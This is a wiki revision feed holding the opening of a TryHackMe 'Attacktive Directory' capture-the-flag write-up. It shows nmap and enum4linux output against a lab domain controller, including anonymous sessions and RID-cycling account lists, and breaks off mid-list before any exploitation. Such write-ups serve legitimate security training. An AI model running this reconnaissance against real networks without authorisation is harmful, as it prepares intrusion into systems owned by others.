<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://book.ghanim.no/index.php?action=history&amp;feed=atom&amp;title=Write-ups%2FTHM%2FAttacktive_Directory</id>
	<title>Write-ups/THM/Attacktive Directory - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://book.ghanim.no/index.php?action=history&amp;feed=atom&amp;title=Write-ups%2FTHM%2FAttacktive_Directory"/>
	<link rel="alternate" type="text/html" href="https://book.ghanim.no/index.php?title=Write-ups/THM/Attacktive_Directory&amp;action=history"/>
	<updated>2026-04-21T15:11:55Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.45.1</generator>
	<entry>
		<id>https://book.ghanim.no/index.php?title=Write-ups/THM/Attacktive_Directory&amp;diff=1144&amp;oldid=prev</id>
		<title>imported&gt;Aghanim at 12:23, 6 August 2021</title>
		<link rel="alternate" type="text/html" href="https://book.ghanim.no/index.php?title=Write-ups/THM/Attacktive_Directory&amp;diff=1144&amp;oldid=prev"/>
		<updated>2021-08-06T12:23:41Z</updated>

		<summary type="html">&lt;p&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;{{Infobox WriteUp&lt;br /&gt;
| name = Attacktive Directory&lt;br /&gt;
| platform = TryHackMe&lt;br /&gt;
| os = Windows&lt;br /&gt;
| difficulty = Medium&lt;br /&gt;
| techniques = AD, Kerberos, ASREPRoast&lt;br /&gt;
}}&lt;br /&gt;
&lt;br /&gt;
[[File:2020-06-kisspng-active-directory-federation-services-microsoft-off-5b1e5b080fff82.7771912715287160400655.png|thumb|Microsoft – Ivor Ontita]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[https://www.tryhackme.com/room/attacktivedirectory https://www.tryhackme.com/room/attacktivedirectory]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This CTF is more &amp;quot;guided and less challenge based&amp;quot;. Its one of the more interesting Windows rooms I&amp;#039;ve tried on THM.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Enumeration ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
We start with NMAP scan.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# Nmap 7.60 scan initiated Fri Aug  6 12:08:59 2021 as: nmap -sC -sV -oN nmap.result 10.10.195.136&lt;br /&gt;
Nmap scan report for ip-10-10-195-136.eu-west-1.compute.internal (10.10.195.136)&lt;br /&gt;
Host is up (0.00046s latency).&lt;br /&gt;
Not shown: 987 closed ports&lt;br /&gt;
PORT     STATE SERVICE       VERSION&lt;br /&gt;
53/tcp   open  domain        Microsoft DNS&lt;br /&gt;
80/tcp   open  http          Microsoft IIS httpd 10.0&lt;br /&gt;
| http-methods:&lt;br /&gt;
|_  Potentially risky methods: TRACE&lt;br /&gt;
|_http-server-header: Microsoft-IIS/10.0&lt;br /&gt;
|_http-title: IIS Windows Server&lt;br /&gt;
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-08-06 11:10:23Z)&lt;br /&gt;
135/tcp  open  msrpc         Microsoft Windows RPC&lt;br /&gt;
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn&lt;br /&gt;
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)&lt;br /&gt;
445/tcp  open  microsoft-ds?&lt;br /&gt;
464/tcp  open  kpasswd5?&lt;br /&gt;
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0&lt;br /&gt;
636/tcp  open  tcpwrapped&lt;br /&gt;
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)&lt;br /&gt;
3269/tcp open  tcpwrapped&lt;br /&gt;
3389/tcp open  ms-wbt-server Microsoft Terminal Services&lt;br /&gt;
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local&lt;br /&gt;
| Not valid before: 2021-08-05T10:49:45&lt;br /&gt;
|_Not valid after:  2022-02-04T10:49:45&lt;br /&gt;
|_ssl-date: 2021-08-06T11:10:28+00:00; 0s from scanner time.&lt;br /&gt;
MAC Address: 02:6F:F9:F4:7B:2F (Unknown)&lt;br /&gt;
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows&lt;br /&gt;
&lt;br /&gt;
Host script results:&lt;br /&gt;
|_nbstat: NetBIOS name: ATTACKTIVEDIREC, NetBIOS user: , NetBIOS MAC: 02:6f:f9:f4:7b:2f (unknown)&lt;br /&gt;
| smb2-security-mode:&lt;br /&gt;
|   2.02:&lt;br /&gt;
|_    Message signing enabled and required&lt;br /&gt;
| smb2-time:&lt;br /&gt;
|   date: 2021-08-06 12:10:28&lt;br /&gt;
|_  start_date: 1600-12-31 23:58:45&lt;br /&gt;
&lt;br /&gt;
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .&lt;br /&gt;
# Nmap done at Fri Aug  6 12:10:41 2021 -- 1 IP address (1 host up) scanned in 102.32 seconds&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Many ports that are open. Using enum4linux to enunmerate port 139/445 (SMB).&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
WARNING: polenum.py is not in your path.  Check that package is installed and your PATH is sane.&lt;br /&gt;
WARNING: ldapsearch is not in your path.  Check that package is installed and your PATH is sane.&lt;br /&gt;
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Aug  6 12:20:34 2021&lt;br /&gt;
&lt;br /&gt;
 ==========================&lt;br /&gt;
|    Target Information    |&lt;br /&gt;
 ==========================&lt;br /&gt;
Target ........... 10.10.195.136&lt;br /&gt;
RID Range ........ 500-550,1000-1050&lt;br /&gt;
Username ......... &amp;#039;&amp;#039;&lt;br /&gt;
Password ......... &amp;#039;&amp;#039;&lt;br /&gt;
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 =====================================================&lt;br /&gt;
|    Enumerating Workgroup/Domain on 10.10.195.136    |&lt;br /&gt;
 =====================================================&lt;br /&gt;
[+] Got domain/workgroup name: THM-AD&lt;br /&gt;
&lt;br /&gt;
 =============================================&lt;br /&gt;
|    Nbtstat Information for 10.10.195.136    |&lt;br /&gt;
 =============================================&lt;br /&gt;
Looking up status of 10.10.195.136&lt;br /&gt;
	ATTACKTIVEDIREC  -         B   Workstation Service&lt;br /&gt;
	THM-AD           -  B   Domain/Workgroup Name&lt;br /&gt;
	THM-AD           -  B   Domain Controllers&lt;br /&gt;
	THM-AD           -         B   Domain Master Browser&lt;br /&gt;
	ATTACKTIVEDIREC  -         B   File Server Service&lt;br /&gt;
&lt;br /&gt;
	MAC Address = 02-6F-F9-F4-7B-2F&lt;br /&gt;
&lt;br /&gt;
 ======================================&lt;br /&gt;
|    Session Check on 10.10.195.136    |&lt;br /&gt;
 ======================================&lt;br /&gt;
[+] Server 10.10.195.136 allows sessions using username &amp;#039;&amp;#039;, password &amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
 ============================================&lt;br /&gt;
|    Getting domain SID for 10.10.195.136    |&lt;br /&gt;
 ============================================&lt;br /&gt;
Domain Name: THM-AD&lt;br /&gt;
Domain Sid: S-1-5-21-3591857110-2884097990-301047963&lt;br /&gt;
[+] Host is part of a domain (not a workgroup)&lt;br /&gt;
&lt;br /&gt;
 =======================================&lt;br /&gt;
|    OS information on 10.10.195.136    |&lt;br /&gt;
 =======================================&lt;br /&gt;
[+] Got OS info for 10.10.195.136 from smbclient:&lt;br /&gt;
[+] Got OS info for 10.10.195.136 from srvinfo:&lt;br /&gt;
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED&lt;br /&gt;
&lt;br /&gt;
 ==============================&lt;br /&gt;
|    Users on 10.10.195.136    |&lt;br /&gt;
 ==============================&lt;br /&gt;
[E] Couldn&amp;#039;t find users using querydispinfo: NT_STATUS_ACCESS_DENIED&lt;br /&gt;
&lt;br /&gt;
[E] Couldn&amp;#039;t find users using enumdomusers: NT_STATUS_ACCESS_DENIED&lt;br /&gt;
&lt;br /&gt;
 ==========================================&lt;br /&gt;
|    Share Enumeration on 10.10.195.136    |&lt;br /&gt;
 ==========================================&lt;br /&gt;
WARNING: The &amp;quot;syslog&amp;quot; option is deprecated&lt;br /&gt;
smb1cli_req_writev_submit: called for dialect[SMB3_11] server[10.10.195.136]&lt;br /&gt;
&lt;br /&gt;
	Sharename       Type      Comment&lt;br /&gt;
	---------       ----      -------&lt;br /&gt;
Error returning browse list: NT_STATUS_REVISION_MISMATCH&lt;br /&gt;
Reconnecting with SMB1 for workgroup listing.&lt;br /&gt;
Connection to 10.10.195.136 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)&lt;br /&gt;
Failed to connect with SMB1 -- no workgroup available&lt;br /&gt;
&lt;br /&gt;
[+] Attempting to map shares on 10.10.195.136&lt;br /&gt;
&lt;br /&gt;
 =====================================================&lt;br /&gt;
|    Password Policy Information for 10.10.195.136    |&lt;br /&gt;
 =====================================================&lt;br /&gt;
[E] Dependent program &amp;quot;polenum.py&amp;quot; not present.  Skipping this check.  Download polenum from http://labs.portcullis.co.uk/application/polenum/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 ===============================&lt;br /&gt;
|    Groups on 10.10.195.136    |&lt;br /&gt;
 ===============================&lt;br /&gt;
&lt;br /&gt;
[+] Getting builtin groups:&lt;br /&gt;
&lt;br /&gt;
[+] Getting builtin group memberships:&lt;br /&gt;
&lt;br /&gt;
[+] Getting local groups:&lt;br /&gt;
&lt;br /&gt;
[+] Getting local group memberships:&lt;br /&gt;
&lt;br /&gt;
[+] Getting domain groups:&lt;br /&gt;
&lt;br /&gt;
[+] Getting domain group memberships:&lt;br /&gt;
&lt;br /&gt;
 ========================================================================&lt;br /&gt;
|    Users on 10.10.195.136 via RID cycling (RIDS: 500-550,1000-1050)    |&lt;br /&gt;
 ========================================================================&lt;br /&gt;
[I] Found new SID: S-1-5-21-3591857110-2884097990-301047963&lt;br /&gt;
[I] Found new SID: S-1-5-21-3532885019-1334016158-1514108833&lt;br /&gt;
[+] Enumerating users using SID S-1-5-21-3532885019-1334016158-1514108833 and logon username &amp;#039;&amp;#039;, password &amp;#039;&amp;#039;&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-500 ATTACKTIVEDIREC\Administrator (Local User)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-501 ATTACKTIVEDIREC\Guest (Local User)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-502 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-503 ATTACKTIVEDIREC\DefaultAccount (Local User)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-504 ATTACKTIVEDIREC\WDAGUtilityAccount (Local User)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-505 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-506 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-507 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-508 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-509 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-510 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-511 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-512 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-513 ATTACKTIVEDIREC\None (Domain Group)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-514 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-515 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-516 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-517 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-518 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-519 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-520 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-521 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-522 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-523 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-524 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-525 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-526 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-527 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-528 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-529 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-530 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-531 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-532 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-533 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-534 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-535 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-536 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-537 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-538 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-539 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-540 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-541 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-542 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-543 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-544 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-545 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-546 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-547 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-548 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-549 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-550 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1000 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1001 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1002 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1003 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1004 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1005 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1006 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1007 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1008 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1009 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1010 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1011 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1012 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1013 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1014 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1015 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1016 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1017 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1018 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1019 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1020 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1021 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1022 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1023 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1024 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1025 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1026 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1027 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1028 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1029 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1030 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1031 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1032 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1033 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1034 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1035 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1036 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1037 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1038 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1039 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1040 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1041 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1042 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1043 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1044 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1045 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1046 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1047 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1048 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1049 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3532885019-1334016158-1514108833-1050 *unknown*\*unknown* (8)&lt;br /&gt;
[+] Enumerating users using SID S-1-5-21-3591857110-2884097990-301047963 and logon username &amp;#039;&amp;#039;, password &amp;#039;&amp;#039;&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-500 THM-AD\Administrator (Local User)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-501 THM-AD\Guest (Local User)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-502 THM-AD\krbtgt (Local User)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-503 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-504 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-505 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-506 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-507 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-508 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-509 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-510 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-511 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-512 THM-AD\Domain Admins (Domain Group)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-513 THM-AD\Domain Users (Domain Group)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-514 THM-AD\Domain Guests (Domain Group)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-515 THM-AD\Domain Computers (Domain Group)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-516 THM-AD\Domain Controllers (Domain Group)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-517 THM-AD\Cert Publishers (Local Group)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-518 THM-AD\Schema Admins (Domain Group)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-519 THM-AD\Enterprise Admins (Domain Group)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-520 THM-AD\Group Policy Creator Owners (Domain Group)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-521 THM-AD\Read-only Domain Controllers (Domain Group)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-522 THM-AD\Cloneable Domain Controllers (Domain Group)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-523 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-524 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-525 THM-AD\Protected Users (Domain Group)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-526 THM-AD\Key Admins (Domain Group)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-527 THM-AD\Enterprise Key Admins (Domain Group)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-528 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-529 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-530 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-531 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-532 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-533 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-534 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-535 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-536 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-537 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-538 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-539 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-540 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-541 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-542 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-543 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-544 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-545 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-546 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-547 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-548 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-549 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-550 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1000 THM-AD\ATTACKTIVEDIREC$ (Local User)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1001 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1002 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1003 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1004 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1005 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1006 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1007 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1008 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1009 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1010 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1011 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1012 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1013 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1014 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1015 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1016 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1017 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1018 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1019 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1020 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1021 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1022 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1023 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1024 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1025 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1026 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1027 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1028 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1029 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1030 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1031 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1032 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1033 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1034 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1035 *unknown*\*unknown* (8)&lt;br /&gt;
